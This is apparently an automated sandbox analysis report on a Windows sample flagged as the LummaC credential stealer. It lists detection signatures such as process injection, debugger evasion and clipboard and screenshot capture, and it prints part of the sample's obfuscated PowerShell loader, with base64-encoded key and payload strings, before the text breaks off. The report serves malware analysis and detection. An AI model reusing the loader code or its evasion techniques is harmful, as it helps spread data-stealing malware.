Edit tour
Windows
Analysis Report
file.exe
Overview
General Information
Detection
LummaC
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected LummaC Stealer
.NET source code contains very large strings
.NET source code references suspicious native API functions
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Compiles code for process injection (via .Net compiler)
Contains functionality to prevent local Windows debugging
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
Sample uses string decryption to hide its real strings
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Suspicious execution chain found
Suspicious powershell command line found
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- file.exe (PID: 6944 cmdline:
"C:\Users\ user\Deskt op\file.ex e" MD5: A2B2889063A7A3F9785253F937EE6FE4) - powershell.exe (PID: 7036 cmdline:
"powershel l.exe" $k eaIuuYBVmg hWL9Jc2UVE bVvdX4qcWL vjMmbPDVK4 Z9haDGMPvL R3MrIRe560 7YAblyJZxt 8GKseCfW9Q RagKu16WdU a8pjxA9FpF xnSBcLSUMG bTwPJwhpgT 1oldTAQ0ve 2963T4Sf8i IMI7iRb9aA SjZ5eJBeic usZ7dBn3wf dCRyKOfOvB YgpuWjKApK 2dwvnQnbt = 'RrQCwf6 yfelfaItjS pP5Lem05xy CdtLsxmDjv XtJ1qg=' $ q2uFwRaFdb a9SUllJ9H7 R4q8l3qzVY cg66pYaTf5 bh3tTyxQzm 7t05BWbVT3 1biPytDl5V KpubwaAwOm 6az9qjQA43 mOAMEAyOvZ vLlcchyo91 WfH6wqbIYP dCRB9wpi7v bmBorWpVxI k11DIHG3PN ZqpgmstkCg sQQdp8dSfb BOLP4MaOs2 pV2T6lwWCy 1FTRQ4KnN9 = '6IxK6q xMw723JyOL kLhRJQ==' $g3IdvVQ10 UZ3mjgOOC4 LurmdlMAGV Ku1DWO8QDt 8FRkfZgftP g9NTZzpg4r jVJFQ0yZ14 IxKIwFcGHO F6GqfbgIeW ZrmLKMwM3P 1QOYHjYEVT Vi9QmMPTZf jplFFRLzyk J0crmoShjw MclUyhR5Yx wcmo5b4ITq 7ZGcKwFi3y u7932HE1GY zfaAn6doWK TKYtYn5IJC b = 'WbVnO uXFi5VdHFv lH8VLFLqCH p99aV7e98o 0gKg8BrhdO 82KvBRZpWV PfobXuKseH 2pcy+l2TCy JfEhiDTSGG hJ2bJvrEd6 Jn8YMDA6pa gITIvCFAAD HRiYf6jzMg Sg3g8UJC89 M0/qyyYaD5 SUZY09/C7h NOKP6OpvYq wARJOWKpo0 FJsUgtYh9Z 0IZlTmfDQL MYRSBjoiye rwB+uMGBe9 S1HbIS2rXn OPeWVFaU7p 8cQ6Jxhs8X 8AuEu9Yx+v BQ6OczGSU/ bolI7fal5u BeBcaL8Sg5 3utSrbZM7g DvNtm0rtID ox3Ud/axb3 HTk3OWmX9S 1HPE4fRmPv y2+fvSsNEU CuaqkThljR KwYtzlgI=' function 9B0DZDTVY 7CBvqsoFpd TRVTejJgFf bvSEm0dKxY 3U1xdQI2C6 y0T6jUMilT PXNgmbkwI0 OdI1JypYgY agd8gLclW2 NvYdIGGlLB 5MTcRURsVk 4nCXi9jfza zzagNTO5TD rENfsYVAQV ukYbxZsBu8 V1laB6bdZy Fm8Ts0aX5U MjYdgPazjo 0Nakg0SddW mjbSQHLFi6 p ($MKO9YV aiER8NdDIe OBdsIqsAOI 7oy0TeePaJ brja8LVAWC uoFU4f6lMW ROWQolkdxt 8Y2yCXSCUx 4rfLNjidvd ItCOrX62lm 0iC235WHRH X31Pq09JCF DGiUkfVNGf rpR76mpMhi XbVnPe1mY1 oV0fjUzihn JHAbQ8LujE bV1Ui1juEF N9pfq5ZcnL mG5t8Pak7g 27DT, $kea IuuYBVmghW L9Jc2UVEbV vdX4qcWLvj MmbPDVK4Z9 haDGMPvLR3 MrIRe5607Y AblyJZxt8G KseCfW9QRa gKu16WdUa8 pjxA9FpFxn SBcLSUMGbT wPJwhpgT1o ldTAQ0ve29 63T4Sf8iIM I7iRb9aASj Z5eJBeicus Z7dBn3wfdC RyKOfOvBYg puWjKApK2d wvnQnbt, $ q2uFwRaFdb a9SUllJ9H7 R4q8l3qzVY cg66pYaTf5 bh3tTyxQzm 7t05BWbVT3 1biPytDl5V KpubwaAwOm 6az9qjQA43 mOAMEAyOvZ vLlcchyo91 WfH6wqbIYP dCRB9wpi7v bmBorWpVxI k11DIHG3PN ZqpgmstkCg sQQdp8dSfb BOLP4MaOs2 pV2T6lwWCy 1FTRQ4KnN9 ) { $56a VdDIumwbta 7sLoc2IwkJ 72HFX8E4RM zvhAXDXJjq ZKpAkYwV2P YslVCt6xlW i1UhbcKK19 FyNtkVdGWz chCBnGJWx3 7ZYXIxqHZI NlvtK0esbg QZcmjAZSu4 2pMxBf9pkm 55hMlqmIrX 2RjRNHnceI 87NufX8xs4 qoHoKliZAs NR07CLFvku rwLcNyRm7Y RpQV6dJ = [Convert]: :FromBase6 4String($k eaIuuYBVmg hWL9Jc2UVE bVvdX4qcWL vjMmbPDVK4 Z9haDGMPvL R3MrIRe560 7YAblyJZxt 8GKseCfW9Q RagKu16WdU a8pjxA9FpF xnSBcLSUMG bTwPJwhpgT 1oldTAQ0ve 2963T4Sf8i IMI7iRb9aA SjZ5eJBeic usZ7dBn3wf dCRyKOfOvB YgpuWjKApK 2dwvnQnbt) $vG1ZYc luRGgs4SdN ycud5aM4vs cbYBEAYBKo S43U0iwrau CGdbRkcAdU ux35AJ5QCf 33Hou3I9Nn eWtBq5xmjT YYXpuWByTQ Mfou19yoho bCnqg9D2f4 Mi7iREFRu9 2KQxay6y9Q